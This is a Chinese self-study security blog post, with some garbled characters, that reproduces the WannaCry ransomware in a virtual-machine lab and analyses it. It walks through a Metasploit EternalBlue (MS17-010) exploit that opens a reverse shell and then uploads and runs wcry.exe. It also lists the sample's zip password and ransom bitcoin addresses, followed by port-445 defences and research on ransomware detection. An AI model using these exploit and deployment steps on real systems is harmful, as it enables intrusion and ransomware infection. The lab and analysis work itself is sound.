这是做者的网络安全自学教程系列，主要是关于安全工具和实践操做的在线笔记，特分享出来与博友们学习，但愿您们喜欢，一块儿进步。前文分享了经过Python利用永恒之蓝漏洞加载WannaCry勒索病毒，并实现对Win7文件加密的过程，但过程较为复杂，为何不直接利用永恒之蓝呢？因此，这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell，再上传勒索病毒进行实验复现，并详细讲解WannaCry勒索病毒的原理。基础性文章，但愿对您有所帮助。php

做者做为网络安全的小白，分享一些自学基础教程给你们，主要是关于安全工具和实践操做的在线笔记，但愿您们喜欢。同时，更但愿您能与我一块儿操做和进步，后续将深刻学习网络安全和系统安全知识并分享相关实验。总之，但愿该系列文章对博友有所帮助，写文不易，大神们不喜勿喷，谢谢！若是文章对您有帮助，将是我创做的最大动力，点赞、评论、私聊都可，一块儿加油喔~html

PS：本文参考了github、安全网站和参考文献中的文章（详见参考文献），并结合本身的经验和实践进行撰写，也推荐你们阅读参考文献。linux

做者的github资源：
软件安全：https://github.com/eastmountyxz/Software-Security-Course
其余工具：https://github.com/eastmountyxz/NetworkSecuritySelf-study
漏洞利用：https://github.com/eastmountyxz/WannaCry-Experimentgit

声明：本人坚定反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络须要咱们共同维护，更推荐你们了解它们背后的原理，更好地进行防御。github

前文学习：
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
[网络安全自学篇] 二.Chrome浏览器保留密码功能渗透解析及登陆加密入门笔记
[网络安全自学篇] 三.Burp Suite工具安装配置、Proxy基础用法及暴库示例
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
[网络安全自学篇] 五.IDA Pro反汇编工具初识及逆向工程解密实战
[网络安全自学篇] 六.OllyDbg动态分析工具基础用法及Crakeme逆向
[网络安全自学篇] 七.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨
[网络安全自学篇] 八.Web漏洞及端口扫描之Nmap、ThreatScan和DirBuster工具
[网络安全自学篇] 九.社会工程学之基础概念、IP获取、IP物理定位、文件属性
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
[网络安全自学篇] 十一.虚拟机VMware+Kali安装入门及Sqlmap基本用法
[网络安全自学篇] 十二.Wireshark安装入门及抓取网站用户名密码（一）
[网络安全自学篇] 十三.Wireshark抓包原理（ARP劫持、MAC泛洪）及数据流追踪和图像抓取（二）
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通讯（一）
[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程（二）
[网络安全自学篇] 十六.Python攻防之弱口令、自定义字典生成及网站暴库防御
[网络安全自学篇] 十七.Python攻防之构建Web目录扫描器及ip代理池（四）
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示（一）
[网络安全自学篇] 十九.Powershell基础入门及常见用法（一）
[网络安全自学篇] 二十.Powershell基础入门及常见用法（二）
[网络安全自学篇] 二十一.GeekPwn极客大赛之安全攻防技术总结及ShowTime
[网络安全自学篇] 二十二.Web渗透之网站信息、域名信息、端口信息、敏感信息及指纹信息收集
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
[网络安全自学篇] 二十四.基于机器学习的恶意代码识别及人工智能中的恶意代码检测
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防护初探
[网络安全自学篇] 二十六.Shodan搜索引擎详解及Python命令行调用
[网络安全自学篇] 二十七.Sqlmap基础用法、CTF实战及请求参数设置（一）
[网络安全自学篇] 二十八.文件上传漏洞和Caidao入门及防护原理（一）
[网络安全自学篇] 二十九.文件上传漏洞和IIS6.0解析漏洞及防护原理（二）
[网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防护（三）
[网络安全自学篇] 三十一.文件上传漏洞之Upload-labs靶场及CTF题目01-10（四）
[网络安全自学篇] 三十二.文件上传漏洞之Upload-labs靶场及CTF题目11-20（五）
[网络安全自学篇] 三十三.文件上传漏洞之绕狗一句话原理和绕过安全狗（六）
[网络安全自学篇] 三十四.Windows系统漏洞之5次Shift漏洞启动计算机
[网络安全自学篇] 三十五.恶意代码攻击溯源及恶意样本分析
[网络安全自学篇] 三十六.WinRAR漏洞复现（CVE-2018-20250）及恶意软件自启动劫持
[网络安全自学篇] 三十七.Web渗透提升班之hack the box在线靶场注册及入门知识（一）
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求（二）
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法（三）
[网络安全自学篇] 四十.phpMyAdmin 4.8.1后台文件包含漏洞复现及详解（CVE-2018-12613）
[网络安全自学篇] 四十一.中间人攻击和ARP欺骗原理详解及漏洞还原
[网络安全自学篇] 四十二.DNS欺骗和钓鱼网站原理详解及漏洞还原
[网络安全自学篇] 四十三.木马原理详解、远程服务器IPC$漏洞及木马植入实验
[网络安全自学篇] 四十四.Windows远程桌面服务漏洞（CVE-2019-0708）复现及详解
[网络安全自学篇] 四十五.病毒详解及批处理病毒制做（自启动、修改密码、定时关机、蓝屏、进程关闭）
[网络安全自学篇] 四十六.微软证书漏洞CVE-2020-0601 (上)Windows验证机制及可执行文件签名复现
[网络安全自学篇] 四十七.微软证书漏洞CVE-2020-0601 (下)Windows证书签名及HTTPS网站劫持
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客经常使用DOS命令
[网络安全自学篇] 四十九.Procmon软件基本用法及文件进程、注册表查看
[网络安全自学篇] 五十.虚拟机基础之安装XP系统、文件共享、网络快照设置及Wireshark抓取BBS密码
[网络安全自学篇] 五十一.恶意样本分析及HGZ木马控制目标服务器
[网络安全自学篇] 五十二.Windows漏洞利用之栈溢出原理和栈保护GS机制
[网络安全自学篇] 五十三.Windows漏洞利用之Metasploit实现栈溢出攻击及反弹shell
[网络安全自学篇] 五十四.Windows漏洞利用之基于SEH异常处理机制的栈溢出攻击及shell提取
[网络安全自学篇] 五十五.Windows漏洞利用之构建ROP链绕过DEP并获取Shell
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
[网络安全自学篇] 五十七.PE文件逆向之什么是数字签名及Signtool签名工具详解（一）
[网络安全自学篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反弹shell
[网络安全自学篇] 五十九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及shell深度提权
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和经常使用渗透命令
[网络安全自学篇] 六十一.PE文件逆向之数字签名详细解析及Signcode、PEView、010Editor、Asn1View等工具用法（二）
[网络安全自学篇] 六十二.PE文件逆向之PE文件解析、PE编辑工具使用和PE结构修改（三）
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权（四）
[网络安全自学篇] 六十四.Windows漏洞利用之SMBv3服务远程代码执行漏洞（CVE-2020-0796）复现及详解
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例（一）
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用（二）
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析（一）Python利用永恒之蓝及Win7勒索加密web

前文欣赏：
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
[渗透&攻防] 二.SQL MAP工具从零解读数据库及基础用法
[渗透&攻防] 三.数据库之差别备份及Caidao利器
[渗透&攻防] 四.详解MySQL数据库攻防及Fiddler神器分析数据包正则表达式

一.WannaCry背景

2017年5月12日，WannaCry蠕虫经过永恒之蓝MS17-010漏洞在全球范围大爆发，感染大量的计算机。WannaCry勒索病毒全球大爆发，至少150个国家、30万名用户中招，形成损失达80亿美圆，已影响金融、能源、医疗、教育等众多行业，形成严重的危害。算法

WannaCry是一种“蠕虫式”勒索病毒软件，由不法分子利用NSA泄露方程式工具包的危险漏洞“EternalBlue”（永恒之蓝）进行传播。该蠕虫感染计算机后会向计算机中植入敲诈者病毒，致使电脑大量文件被加密。shell

WannaCry利用Windows系统的SMB漏洞获取系统的最高权限，该工具经过恶意代码扫描开放445端口的Windows系统。被扫描到的Windows系统，只要开机上线，不须要用户进行任何操做，便可经过共享漏洞上传WannaCry勒索病毒等恶意程序。数据库

WannaCry利用永恒之蓝漏洞进行网络端口扫描攻击，目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染，并做为攻击机再次扫描互联网和局域网的其余机器，行成蠕虫感染大范围超快速扩散。

木马母体为mssecsvc.exe，运行后会扫描随机IP的互联网机器，尝试感染，也会扫描局域网相同网段的机器进行感染传播，此外会释放敲诈者程序tasksche.exe，对磁盘文件进行加密勒索。

木马加密使用AES加密文件，并使用非对称加密算法RSA 2048加密随机密钥，每一个文件使用一个随机密钥，理论上不可攻破。同时@WanaDecryptor@.exe显示勒索界面。其核心流程以下图所示：

WannaCry勒索病毒主要行为是传播和勒索。

• 传播：利用基于445端口的SMB漏洞MS17-010(永恒之蓝)进行传播
• 勒索：释放文件，包括加密器、解密器、说明文件、语言文件等；内存加载加密器模块，加密执行类型文件，所有加密后启动解密器；解密器启动后，设置桌面背景显示勒索信息，弹出窗口显示付款帐号和勒索信息

二.WannaCry实验复现

1.实验环境搭建

实验环境：

• 攻击机：Kali-linux-2019.2 IP:192.168.44.138
• 受害主机：Win7 64位 IP:192.168.44.147

实验工具：

• metasploit
• MS17-010
• Wcry.exe

实验步骤：

• 配置Windows Server 200三、Kali、Windows7实验环境
• Kali检测受害主机445端口（SMB协议）是否开启
• 运行EternalBlue永恒之蓝漏洞(MS17-010)反弹shell
• 上传勒索病毒wcry.exe并运行
• 实现勒索和文件加密

切记、切记、切记：实验复现过程当中必须在虚拟机中完成，运行以前关闭虚拟机Win7文件共享，真机上一旦被感染你就真的只能想哭了（wannacry）。同时，该实验比上一篇文章精简不少，更推荐该方法。

第一步，建立虚拟机并安装Windows7 x64位操做系统。Win7设置开启445端口，同时关闭防火墙。注意，关闭虚拟机文件共享功能。

第二步，保证攻击机和受害机相互通信，均在同一个局域网中。

2.Kali利用MS17-010反弹Shell

第一步，扫描靶机是否开启445端口。

• nmap -sS 192.168.44.147

第二步，打开msfconsole并查询MS17-010漏洞模块。
这里有各类MS17-010漏洞版本，咱们根据目标系统选择编号为3的版本。推荐读者看看NSA泄露的方程式工具包，其中永恒之蓝（eternalblue）就是著名的漏洞。

• msfconsole
• search ms17-010

第三步，利用永恒之蓝漏洞并设置参数。

• use exploit/windows/smb/ms17_010_eternalblue
  利用永恒之蓝漏洞
• set payload windows/x64/meterpreter/reverse_tcp
  设置payload
• set LHOST 192.168.44.138
  设置本机IP地址
• set RHOSTS 192.168.44.147
  设置受害主机IP
• set RPORT 445
  设置端口445，注意该端口共享功能是高危漏洞端口，包括以前分享的13九、3389等
• exploit
  利用漏洞

第四步，成功获取Win7系统管理员权限。

• getuid
  返回系统管理员权限
• pwd、ls
  查看当前路径及目录

第五步，上传勒索病毒至Win7系统。再次强调，虚拟机中运行该实验，而且关闭文件共享功能。

• shell
• upload /root/wcry.exe c:\
• wcry.exe

第六步，运行勒索病毒，实验复现成功。
运行前的受害主机界面以下图所示：

运行病毒程序后的界面以下图所示，已经成功被勒索。再次强调，全部代码必须在虚拟机中执行，而且关闭文件共享。

加密系统中的文件，被加密的文件后缀名统一修改成“.WNCRY”。

• b.wnry: 中招敲诈者后桌面壁纸
• c.wnry: 配置文件，包含洋葱域名、比特币地址、tor下载地址等
• f.wnry: 可免支付解密的文件列表
• r.wnry: 提示文件，包含中招提示信息
• s.wnry: zip文件，包含Tor客户端
• t.wnry: 测试文件
• u.wnry: 解密程序

三.防护措施

勒索软件防护常见的措施以下：

• 开启系统防火墙
• 关闭44五、139等端口链接
• 开启系统自动更新，下载并更新补丁，及时修复漏洞
• 安装安全软件，开启主动防护进行拦截查杀
• 如非服务须要，建议把高危漏洞的端口都关闭，好比13八、13九、44五、3389等

因为WannaCry勒索病毒主要经过445端口入侵计算机，关闭的方法以下：

• 控制面板–>windows防火墙—>高级选项–>入站规则
• 新建规则–>选择端口–>指定端口号445
• 选择阻止链接–>配置文件全选–>规则名称–>成功关闭

实验在虚拟机中进行，也须要关闭共享文件夹功能，以下图所示。

四.WannaCry病毒分析

分析方法主要有两种：静态分析和动态分析

• 静态分析以反汇编为主，经过分析勒索软件的代码了解其行为和各功能实现细节
• 动态分析主要有动态调试、行为分析、沙盒分析
• 动态调试主要配合静态分析进行，对静态分析进行辅助
• 行为分析主要经过系统日志来观察勒索软件的行为，从而了解勒索软件行为
• 沙盒分析做为目前自动化分析的主要手段，主要用来辅助手动分析。经过在沙盒中运行勒索软件，可以获得勒索软件的API调用、文件行为、网络行为等行为

首先，咱们来看看安天分享的Wannacry流程图，其运行流程包括：

• 主程序文件利用漏洞传播自身，运行WannaCry勒索程序
• WannaCry勒索程序释放tasksche.exe，对磁盘文件进行加密勒索
• @WanaDecryptor@.exe显示勒索信息，解密示例文件

接下来咱们利用IDA进行逆向分析。

1.母体程序mssecsvc.exe行为分析

(1) 主函数逆向以下，包括建立工做目录、设置注册表、导入密钥、对t.wncy解密等功能。

(2) 主程序运行后会先链接该域名，若是该域名能够访问则退出，不触发任何恶意行为。若是该域名没法访问，则触发传播和勒索行为。目前该域名已被英国安全公司接管。

注意，目前网上的wrcy.exe我都只发现了勒索功能，前面网络部分及传播功能代码未找到。若是有该部分样本的读者，但愿能告知做者，很是感谢。

(3) 建立开机自启动mssecsvc2.0服务并启动该服务。

(4) 从木马自身读取MS17-010漏洞利用代码，Playload分为x86和x64两个版本。

(5) 接着母体程序建立两个线程分别扫描内网和外网IP，开始进行蠕虫传播感染。

• 公网：随机IP地址445端口进行扫描感染
• 内网：直接扫描当前计算机所在的网段进行感染

(6) 感染过程尝试链接445端口，若是链接成功则对该地址尝试漏洞攻击感染。

(7) 母体程序mssecsvc.exe利用MS17-010漏洞进行网络传播。
获取目标主机权限后，但其并不会直接发送自身exe程序到目标，而是发送一段通过异或加密后的Payload到目标机器中执行。Payload由shellcode+包含样本自身的dll组成。

dll具备一个导出函数PlayGame，将资源文件释放保存为mssecsvc.exe并执行。

(8) 加载资源到新建目录下并命名为taskche.exe，接着运行该程序。

• StartTaskcheEXE()先尝试以服务的形式启动cmd.exe，cmd.exe经过参数启动taskche.exe
• 若是以服务的方式启动失败，就以普通进程的方式启动taskche.exe

(9) 释放tasksche.exe，路径为C:\windows\tasksche.exe。

2.tasksche.exe行为分析

(1) 解压释放大量敲诈者模块及配置文件，解压密码为WNcry@2ol7。

注意，若是咱们将“wcry.exe”修改成“wcry.zip”，能够发现其是个压缩文件，包括如下内容。其解压密码也正是WNcry@2ol7。

(2) 设置工做目录、设置注册表、解压文件、获取比特币钱包等。

(3) 释放资源。

• b.wnry: 中招敲诈者后桌面壁纸
• c.wnry: 配置文件，包含洋葱域名、比特币地址、tor下载地址等
• f.wnry: 可免支付解密的文件列表
• r.wnry: 提示文件，包含中招提示信息
• s.wnry: zip文件，包含Tor客户端
• t.wnry: 测试文件
• u.wnry: 解密程序

(4) t.wnry文件包含一个加密的dll文件，WannaCry勒索程序会解密并动态加载调用TaskStart导出函数，文件加密等恶意行为在该dll中实现。

(5) 加密勒索过程会建立互斥体和初始化全局变量。

(6) 检查互斥体是否存在。

(7) 检查00000000.dky和00000000.pky是否存在，是否配对。若是加密，则建立线程：更新c.wncy、启动@WanaDecryptor@.exe、设置启动项。

(8) 程序内置RSA 2048公钥用于加密。

(9) 完成全部文件加密后释放说明文档，弹出勒索界面，需支付比特币到指定的比特币钱包地址，三个比特币钱包地址编码于程序中：

• 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
• 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
• 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

3.@WanaDecryptor@.exe程序分析

程序会将@WanaDecryptor@.exe复制到被加密文件的文件夹下，衍生大量语言配置文件、具备加密功能的文件、窗体文件等，该程序没有传播、加密等恶意功能。

IDA逆向以下图所示：

@WanaDecryptor@.exe是样本加密完用户数据显示的勒索界面程序，负责显示比特币钱包地址，演示部分解密文件。详细流程以下图所示：

• @WanaDecryptor@.exe会建立00000000.res，内容为加密的文件数量、大小等信息，随后@WanaDecryptor@.exe样本将该文件内容回传到攻击者的暗网服务器。
• 服务器收到用户上传的00000000.res内容后会返回一个比特币钱包地址，而后样本更新c.wnry配置文件中的比特币钱包地址。
• 当用户根据新的钱包地址付款并点击Check Payment后，会将本地00000000.res和00000000.eky回传到服务器，若是攻击者确认这个00000000.res文件对应的比特币钱包收到付款，则将00000000.eky文件解密后返回给目标主机。
• 受害主机收到服务器解密00000000.eky内容保存为00000000.dky，随后样本遍历磁盘文件，排除设置好的自身文件和系统目录文件，使用收到的00000000.dky密钥解密后缀为.WNCYR或.WNCRY的文件。

五.WannaCry病毒检测

写到这里，整个实验复现及分析过程介绍完毕，接下来做者简单介绍学术界三种检测WannaCry病毒的方法——CryptoLock、ShieldFS、Redemption，更推荐读者阅读论文。

• Scaife N, Carter H, Traynor P, et al. Cryptolock (and drop it): stopping ransomware attacks on user data[C]//2016 IEEE 36th International Conference on Distributed Computing Systems (ICDCS). IEEE, 2016: 303-312.
• Kharraz A, Kirda E. Redemption: Real-time protection against ransomware at end-hosts[C]//International Symposium on Research in Attacks, Intrusions, and Defenses. Springer, Cham, 2017: 98-119.
• Continella A, Guagnelli A, Zingaro G, et al. ShieldFS: a self-healing, ransomware-aware filesystem[C]//Proceedings of the 32nd Annual Conference on Computer Security Applications. ACM, 2016: 336-347.

(1) CryptoLock
CryptoLock在内核层中捕获从用户层发来的I/O请求，并将其发送到应用层进行断定、分类，应用层将Allow/Dis-allow消息发送到内核层后，内核层执行Pass/Block操做。

核心思想是使用文件过滤驱动拦截应用层的I/O请求，而后进行行为断定，若是判断为恶意I/O则拒绝该I/O请求。

主要指标：

• A、文件类型变化：做者经过监控这些头部的转变来检测文件类型是否变化，若是文件类型变化，则写入操做是可疑的。
• B、类似度衡量：做者选用了sdhash来衡量原文件内容与写入内容的类似度，若是写入数据与原数据类似度很低，则该写入操做很可疑。
• C、香农熵（信息熵）：做者使用信息熵来衡量写入数据的无序程度。熵值取值从0~8，越高则认为写入的数据越可疑。

次要指标：

• 删除操做：做者认为，一类勒索病毒经过将加密信息写入其它文件后删除原文件来加密用户文件。当一个进程删除了不少用户文件时，就认为这个进程很可疑。
• 漏斗式文件类型（File Type Funneling）：做者认为正常的进程（如Word），可能会读取不少类型的文件，可是通常只会写入一种类型的文件。当一个进程读取不少种类型的文件，同时又写入了不少种类型的文件时，该进程就很可疑。

做者使用了上面几种指标联合判决的方式来判断一个进程是否为恶意进程。
CryptoLock流程以下所示：

(2) ShieldFS
ShieldFS是在CryptoLock的基础上进行的研究。ShieldFS一样使用文件过滤驱动捕获应用层的I/O请求来进行恶意软件检测，与CryptoLock不一样的是，CryptoLock在判别方式上进行了改进，以及增长了勒索软件检出后的被加密文件恢复机制。

ShieldFS流程如以下所示，其主要模块有两个：检测模块和恢复模块。恢复模块用某种机制对文件进行备份，在检测模块检测出某进程为恶意进程后，恢复被恶意进程加密的文件。

(3) Redemption
与ShieldFS类似的，Redemption也分为恶意行为检测部分和备份部分。它与ShieldFS不一样的地方就在于判别使用的指标和备份、恢复文件的方式。同时，Redemption使用了基于内容的指标和基于行为的指标，最后对各类指标进行计分，经过得分是否超过阈值来判断进程是否为恶意进程。

Redemption流程如以下所示：

六.总结

写到这里，这篇WannaCry勒索病毒复现和分析的文章就介绍结束了，但愿对您有所帮助。接着做者还会继续深刻地逆向分析该勒索病毒的原理及调用关系，也推荐你们阅读参考文献大佬们的文章。继续加油~

这篇文章中若是存在一些不足，还请海涵。做者做为网络安全初学者的慢慢成长路吧！但愿将来能更透彻撰写相关文章。同时很是感谢参考文献中的安全大佬们的文章分享，感谢师傅、师兄师弟、师姐师妹们的教导，深知本身很菜，得努力前行。

欢迎你们讨论，是否以为这系列文章帮助到您！任何建议均可以评论告知读者，共勉。

(By:Eastmount 2020-04-20 晚上8点写于贵阳 http://blog.csdn.net/eastmount/ )

参考文献：
[1] 实验室小伙伴们的分享
[2] 勒索病毒“WannaCry”之复现过程（永恒之蓝）- weixin_40950781
[3] Windows再曝“WannaCry”级漏洞 CVE-2019-0708，专治 XP、Win7 - FB客户
[4] 对WannaCry的深度分析 - 鬼手56
[5] 安天针对勒索蠕虫“魔窟”（WannaCry）的深度分析报告
[6] [原创]勒索病毒WannaCry深度技术分析——详解传播、感染和危害细节 - 火绒实验室
[7] WannaCry蠕虫详细分析 - FreeBuf腾讯
[8] [病毒分析]WannaCry病毒分析(永恒之蓝) - 小彩虹
[9] 威胁预警 | 蠕虫级漏洞BlueKeep(CVE-2019-0708) EXP被公布 - 斗象智能安全平台
[10] [反病毒]病毒分析实战篇1–远控病毒分析 - i春秋老师
[11] wannacry，petaya，meze等病毒样本 - CSDN下载
[12] 针对WannaRen勒索软件的梳理与分析 - 安天